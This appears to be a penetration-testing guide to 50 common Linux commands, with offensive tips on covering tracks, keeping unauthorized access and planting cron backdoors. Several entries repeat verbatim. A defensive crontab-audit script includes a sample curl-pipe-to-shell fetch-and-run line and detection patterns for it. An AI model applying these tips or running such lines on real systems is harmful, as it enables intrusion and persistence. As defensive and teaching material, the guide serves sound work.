Linux commands constitute the fundamental toolkit of a penetration tester or red team operator. Proficiency with these commands empowers effective reconnaissance, exploitation, privilege escalation, and more. In this comprehensive guide, we delve into the 50 most vital Linux commands, offering detailed explanations, command usage examples, and invaluable insights tailored for penetration testers and red team operators.
1. ls – List Files and Directories
The ls command is a crucial asset for reconnaissance, helping you identify and explore target systems:
Usage:
$ ls -l # Detailed listing
$ ls -a # Display hidden files
$ ls -R # List subdirectories recursively
Tip: Combine ls with grep to quickly locate sensitive files like configuration files or databases.
2. cd – Change Directory
Navigating directories is vital for moving through a system during exploitation:
Usage:
$ cd Documents # Change to "Documents" directory
$ cd .. # Move to parent directory
$ cd /path/to/dir # Absolute path navigation
Tip: Change directories seamlessly to access target-specific files or directories.
3. pwd – Print Working Directory
Understanding your current location is essential for efficient navigation:
Usage:
$ pwd
Tip: This command is crucial when you need to provide a precise file path in your scripts or exploits.
4. mkdir – Make Directory
Creating directories is handy for storing your tools, scripts, and findings:
Usage:
$ mkdir Reports # Create "Reports" directory
$ mkdir -p A/B/C # Generate nested directories
Tip: Use -p to generate nested directories at once, facilitating organized storage.
5. cp – Copy Files and Directories
Replicating files and directories is useful for preserving evidence or executing payloads:
Usage:
$ cp file.txt dir/ # Copy file.txt to dir/
$ cp -r dir1 dir2/ # Recursively copy dir1 to dir2/
Tip: Copy malware or scripts to target systems for exploitation.
6. mv – Move and Rename Files
Moving or renaming files aids in concealing your tracks or modifying system behavior:
Usage:
$ mv file.txt newdir/ # Move file.txt to newdir/
$ mv oldfile newfile # Rename oldfile to newfile
Tip: Rename suspicious files to bypass security mechanisms.
7. rm – Remove Files and Directories
Deleting files or directories is vital to cover your tracks and remove evidence:
Usage:
$ rm file.txt # Erase file.txt
$ rm -r dir/ # Eliminate dir/ and its contents
Tip: Use with caution, as improper usage can lead to data loss.
8. cat – Concatenate and Display File Contents
Inspecting file contents aids in understanding system configuration and identifying vulnerabilities:
Usage:
$ cat file.txt
Tip: Display configuration files to uncover sensitive information like passwords.
9. less – View File Contents with Pagination
Reviewing file contents helps analyze configuration files and logs:
Usage:
$ less largefile.txt
Tip: Use grep within less to quickly search for keywords.
10. head and tail – Display Top and Bottom of Files
Viewing the beginning or end of files is useful for analyzing logs and output:
Usage:
$ head -n 10 file.txt # Display first 10 lines
$ tail -n 20 file.txt # Display last 20 lines
Tip: Monitor log files for potential security breaches or unauthorized access.
11. nano – Basic Text Editor
Editing files can be helpful for altering configurations or creating malicious scripts:
Usage:
$ nano file.txt
Tip: Use nano to quickly modify configuration files or write simple scripts.
12. grep – Search Text in Files
Searching text patterns aids in identifying vulnerabilities or uncovering sensitive information:
Usage:
$ grep "pattern" file.txt
$ grep -r "pattern" dir/ # Recursive search in dir/
Tip: Identify exploitable vulnerabilities by searching for common patterns in source code.
13. find – Search Files and Directories
Scouring files and directories is essential for locating sensitive data or exploitable targets:
Usage:
$ find /path -name "file.txt"
$ find / -type d -name "dir"
Tip: Use find to identify potentially interesting files like password hashes or configuration files.
14. ps – List Running Processes
Listing processes aids in identifying running applications and services:
Usage:
$ ps aux
Tip: Investigate unfamiliar processes to detect suspicious activities or unauthorized access.
15. kill – Terminate Processes
Halting processes is useful to stop unwanted or malicious applications:
Usage:
$ kill PID
Tip: Use kill -9 to forcefully terminate unresponsive processes.
16. netstat – Network Statistics
Monitoring network connections helps identify open ports or suspicious network activity:
Usage:
$ netstat -tuln # List listening ports
Tip: Analyze network connections for potential attack vectors.
17. ifconfig – Configure Network Interfaces
Configuring network interfaces is essential for network-based exploitation:
Usage:
$ ifconfig eth0 up # Activate eth0
$ ifconfig eth0 down # Deactivate eth0
Tip: Manipulate network interfaces to establish reverse shells or pivot through networks.
18. ping – Test Network Connectivity
Testing network connectivity aids in identifying live hosts:
Usage:
$ ping google.com
Tip: Use ping to verify if a target is reachable and assess network latency.
19. wget – Download Files from the Web
Downloading files from the internet facilitates obtaining tools or malware:
Usage:
$ wget http://example.com/file.zip
Tip: Download hacking tools or payloads directly to target systems.
20. curl – Transfer Data with URLs
Transferring data via URLs is useful for obtaining information or executing commands:
Usage:
$ curl http://example.com
Tip: Use curl to fetch payloads, scripts, or exploit code from remote servers.
21. ssh – Secure Shell Remote Login
Logging into remote machines is crucial for remote exploitation:
Usage:
$ ssh user@hostname
Tip: Utilize ssh to establish encrypted tunnels for secure communication.
22. scp – Securely Copy Files Between Hosts
Copying files between hosts securely aids in moving tools or data for exploitation:
Usage:
$ scp file.txt user@hostname:/path
Tip: Exploit vulnerable servers by transferring payloads via scp.
23. chmod – Change File Permissions
Altering file permissions is essential for executing scripts or accessing sensitive data:
Usage:
$ chmod +x script.sh # Add execute permission
$ chmod 644 file.txt # Set specific permissions
Tip: Modify permissions to escalate privileges or execute malicious code.
24. chown – Change Ownership of Files
Modifying file ownership helps gain access to files or cover your tracks:
Usage:
$ chown user:group file.txt
Tip: Change ownership of sensitive files to gain access or manipulate data.
25. df – Display Disk Space Usage
Monitoring disk space is vital for identifying potential storage issues or vulnerabilities:
Usage:
$ df -h
Tip: Identify disk space issues that might lead to denial-of-service attacks.
26. du – Display File and Directory Space Usage
Displaying file and directory space usage helps locate large or suspicious files:
Usage:
$ du -sh dir/
Tip: Scan directories for large files that might contain sensitive information.
27. tar – Archive and Extract Files
Archiving and extracting files is handy for collecting evidence or transferring data:
Usage:
$ tar -czvf archive.tar.gz files/ # Create gzipped archive
$ tar -xzvf archive.tar.gz # Extract gzipped archive
Tip: Package logs and sensitive files for later analysis.
28. zip and unzip – Create and Extract ZIP Archives
Creating and extracting ZIP archives is useful for transferring multiple files:
Usage:
$ zip -r archive.zip files/ # Create ZIP archive
$ unzip archive.zip # Extract ZIP archive
Tip: Compress and transport multiple payloads or tools with ease.
29. top – Monitor System Activity
Real-time system monitoring helps identify resource consumption and anomalies:
Usage:
$ top
Tip: Detect malware or unauthorized activities consuming system resources.
30. htop – Interactive System Monitoring
Interactive system monitoring aids in identifying resource usage in real time:
Usage:
$ htop
Tip: Spot malicious processes or sudden spikes in resource usage.
31. grep – Text Search in Files
Searching text patterns aids in identifying vulnerabilities or uncovering sensitive information:
Usage:
$ grep "pattern" file.txt
Tip: Identify exploitable vulnerabilities by searching for common patterns in source code.
32. sed – Stream Editor for Text Manipulation
Streamlining text manipulation assists in crafting payloads or modifying configuration files:
Usage:
$ sed 's/old/new/g' file.txt
Tip: Craft payloads or modify configuration files for privilege escalation.
33. awk – Text Processing and Pattern Matching
Text processing and pattern matching help extract specific data from files:
Usage:
$ awk '{print $1}' file.txt
Tip: Extract passwords, user data, or sensitive information from configuration files.
34. sort – Sort Lines of Text Files
Sorting lines aids in organizing data or extracting unique entries:
Usage:
$ sort file.txt
Tip: Sort and analyze data, such as password lists or user data.
35. uniq – Report or Omit Repeated Lines
Removing duplicates aids in cleaning and analyzing data:
Usage:
$ uniq file.txt
Tip: Identify unique entries in lists, such as usernames or email addresses.
36. cut – Remove Sections from Lines of Files
Extracting specific sections from lines helps in data manipulation:
Usage:
$ cut -d":" -f1,3 file.txt
Tip: Extract specific fields from configuration files for analysis.
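The text-processing commands above (grep, awk, sort, uniq) are most useful chained together. The following is an added example, not part of the original guide: it summarizes failed SSH logins per source address from log text on stdin. The log lines are constructed samples and the function names are hypothetical.

```shell
#!/bin/sh
# Constructed sshd auth-log lines for illustration (not from a real system).
sample_auth_log() {
cat <<'EOF'
Jan 10 03:12:01 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 50122 ssh2
Jan 10 03:12:04 web01 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 50124 ssh2
Jan 10 03:12:09 web01 sshd[2290]: Accepted publickey for deploy from 198.51.100.20 port 40110 ssh2
Jan 10 03:13:15 web01 sshd[2301]: Failed password for root from 192.0.2.44 port 61001 ssh2
Jan 10 03:13:40 web01 sshd[2315]: Failed password for invalid user test from 203.0.113.7 port 50130 ssh2
Jan 10 03:14:02 web01 sshd[2330]: Failed password for root from 192.0.2.44 port 61010 ssh2
Jan 10 03:14:30 web01 sshd[2341]: Failed password for invalid user oracle from 203.0.113.7 port 50141 ssh2
EOF
}

# Count failed SSH logins per source address, busiest first.
# Reads log text on stdin and prints "<count> <address>" lines.
failed_logins_by_source() {
    grep 'Failed password' |
    # Take the address by position from the END of the line
    # ("... from ADDR port N ssh2"): the username is attacker-controlled
    # and could itself contain the word "from".
    awk 'NF >= 5 && $(NF-2) == "port" && $(NF-4) == "from" { print $(NF-3) }' |
    # uniq only collapses ADJACENT duplicates, so sort first.
    sort |
    uniq -c |
    # Highest count first; ties broken by address for stable output.
    sort -k1,1nr -k2,2 |
    # Strip the padding that uniq -c puts in front of the count.
    awk '{ print $1, $2 }'
}

# Print only the sources with at least N failures (default 3).
noisy_sources() {
    threshold="${1:-3}"
    failed_logins_by_source | awk -v t="$threshold" '$1 >= t { print $2 }'
}

sample_auth_log | failed_logins_by_source
```

On a real host the input would be the system's authentication log instead of the sample function; its location and line format vary by distribution.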
37. tee – Redirect Output to File and Screen
Redirecting output is useful for capturing results while monitoring in real time:
Usage:
$ command | tee output.txt
Tip: Capture output from commands to analyze results and detect vulnerabilities.
38. date – Display or Set Date and Time
Manipulating date and time assists in simulating attacks and analyzing logs:
Usage:
$ date
$ date "+%Y-%m-%d %H:%M:%S"
Tip: Modify system time for timestamp-based attacks or evading detection.
39. whoami – Print Effective User ID
Displaying the current user’s ID helps assess available privileges:
Usage:
$ whoami
Tip: Determine your user context to assess the extent of your access.
40. useradd and userdel – Add and Delete Users
Managing user accounts aids in privilege escalation and lateral movement:
Usage:
$ sudo useradd newuser
$ sudo userdel olduser
Tip: Exploit weak user accounts or escalate privileges by adding new users.
41. passwd – Change User Password
Changing user passwords assists in privilege escalation or maintaining access:
Usage:
$ passwd username
Tip: Change passwords to maintain unauthorized access to compromised accounts.
42. sudo – Execute Command as Superuser
Gaining superuser privileges is essential for performing critical operations:
Usage:
$ sudo apt update
$ sudo reboot
Tip: Exploit vulnerabilities to gain access to root-level privileges.
43. crontab – Schedule Tasks
Scheduling tasks can be leveraged for persistence and lateral movement:
Usage:
$ crontab -e # Edit crontab entries
$ crontab -l # List crontab entries
Tip: Set up cron jobs to execute backdoors or maintain persistence.
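Because cron is a common persistence location, reviewing the output of crontab -l is a routine check during incident response and when verifying cleanup after an engagement. The following is an added example, not part of the original guide: it flags cron entries that match two simple heuristics. The crontab content is constructed, and the function names and heuristics are assumptions.

```shell
#!/bin/sh
# Constructed crontab content, as `crontab -l` might print it (not from a real host).
sample_crontab() {
cat <<'EOF'
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://192.0.2.10/u.sh | sh
@reboot /tmp/.cache/updater

30 4 * * 0 /usr/bin/certbot renew --quiet
* * * * * /dev/shm/.x >/dev/null 2>&1
EOF
}

# Flag cron entries worth a second look. Reads crontab text on stdin and
# prints "<reason>: <entry>" per match. Heuristics (assumptions, tune to taste):
#   download-to-shell  a curl/wget download piped straight into sh or bash
#   writable-path      a command run from /tmp, /var/tmp or /dev/shm
audit_crontab() {
    # Drop comments and blank lines first.
    grep -v -E '^[[:space:]]*(#|$)' |
    awk '
        /(curl|wget)[^|]*[|][ \t]*(ba)?sh/      { print "download-to-shell: " $0; next }
        /(^|[ \t])\/(tmp|var\/tmp|dev\/shm)\// { print "writable-path: " $0; next }
    '
}

sample_crontab | audit_crontab
```

On a live host, pipe each user's crontab -l output into the function, along with the system-wide entries in /etc/crontab and /etc/cron.d/.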
44. chmod – Change File Permissions
Altering file permissions is crucial for privilege escalation and accessing sensitive data:
Usage:
$ chmod +x script.sh # Add execute permission
$ chmod 644 file.txt # Set specific permissions
Tip: Modify permissions to escalate privileges or execute malicious code.
45. chown – Change Ownership of Files
Changing ownership aids in gaining access to files or maintaining persistence:
Usage:
$ chown user:group file.txt
Tip: Change ownership of sensitive files to gain access or manipulate data.
46. df – Display Disk Space Usage
Monitoring disk space is vital for identifying potential storage issues or vulnerabilities:
Usage:
$ df -h
Tip: Identify disk space issues that might lead to denial-of-service attacks.
47. du – Display File and Directory Space Usage
Displaying file and directory space usage helps locate large or suspicious files:
Usage:
$ du -sh dir/
Tip: Scan directories for large files that might contain sensitive information.
48. tar – Archive and Extract Files
Archiving and extracting files is handy for collecting evidence or transferring data:
Usage:
$ tar -czvf archive.tar.gz files/ # Create gzipped archive
$ tar -xzvf archive.tar.gz # Extract gzipped archive
Tip: Package logs and sensitive files for later analysis.
49. zip and unzip – Create and Extract ZIP Archives
Creating and extracting ZIP archives is useful for transferring multiple files:
Usage:
$ zip -r archive.zip files/ # Create ZIP archive
$ unzip archive.zip # Extract ZIP archive
Tip: Compress and transport multiple payloads or tools with ease.
50. history – Command History
Viewing your command history helps replicate successful operations and learn from mistakes:
Usage:
$ history
Tip: Identify patterns in your commands and replicate successful exploitation techniques.
Gaining proficiency with these 50 Linux commands is an essential milestone in becoming a skilled penetration tester or red team operator. By mastering these tools and techniques, you’ll be well-equipped to navigate diverse scenarios, from reconnaissance to exploitation and beyond. Continuously refine your skills, delve into more advanced Linux concepts, and build a comprehensive toolkit that empowers you to excel in the dynamic realm of cybersecurity. Wishing you success and discovery in your penetration testing and red teaming journey!